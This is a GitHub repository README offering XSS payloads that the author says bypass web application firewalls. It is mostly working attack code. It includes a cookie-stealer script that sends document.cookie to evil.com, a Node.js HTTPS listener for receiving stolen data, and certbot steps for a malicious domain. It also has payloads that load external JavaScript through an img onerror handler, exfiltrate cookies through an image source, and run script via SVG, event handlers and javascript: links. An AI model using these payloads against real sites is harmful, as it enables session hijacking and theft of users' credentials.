Skip to content

Some collection of xss payloads that worked for me to bypass wafs

Notifications You must be signed in to change notification settings

basedygt/AwesomeXSS

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 

Repository files navigation

Cookie Stealer Example:

  • GET based interception (easiest and best to show Poc):
// XSS cookie stealer POC
var cookie = encodeURIComponent(document.cookie);
var url = 'https://evil.com/index.html/?victim_cookie=' + cookie;
window.location.href = url;
  • POST based interception (I am not responsible for what you do with this info):
  1. Get ssl certitficates for your malicious domain: sudo certbot certonly --standalone -d domain.tld
  2. Setup the listener with ssl certificates
const https = require('https');
const fs = require('fs');

// Load the certificate and key
const cert = fs.readFileSync('cert.pem');
const key = fs.readFileSync('privkey.pem');

// Create the HTTPS server
const server = https.createServer({ cert, key }, (req, res) => {
  if (req.method === 'POST') {
    let data = '';
    req.on('data', (chunk) => {
      data += chunk;
    });
    req.on('end', () => {
      console.log(`Received data: ${data}`);
      res.writeHead(200, { 'Content-Type': 'text/plain' });
      res.end('Data received successfully!');
    });
  } else {
    res.writeHead(405, { 'Content-Type': 'text/plain' });
    res.end('Method not allowed!');
  }
});

// Listen on port 8080
server.listen(8080, () => {
  console.log('Server listening on port 8080');
});

Payloads

  1. Inject External JavaScript without <script> Tag:
<img src=x onerror="var script = document.createElement('script'); script.src = 'https://basedygt.github.io/xss.js'; document.head.appendChild(script);">
  1. Data Exfiltration through Image Source (when CSP is disabled):
<img src="https://evil.com/?data=" + encodeURIComponent(document.cookie)">

Vulnerable when

  • Absence of Content-Security-Policy header in the response
  • Presence of Content-Security-Policy header with a value of default-src or none
  1. CSS-Based XSS:
body { background-image: url('javascript:alert("XSS")'); }
  1. SVG XSS:
<svg/onload=alert(document.domain)>
  1. Event Handlers to Execute Payload:
<button onclick="alert('XSS')">Click Me</button>
  1. JavaScript Protocol Handler:
<a href="javascript:alert('XSS')">Click Me</a>

About

Some collection of xss payloads that worked for me to bypass wafs

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published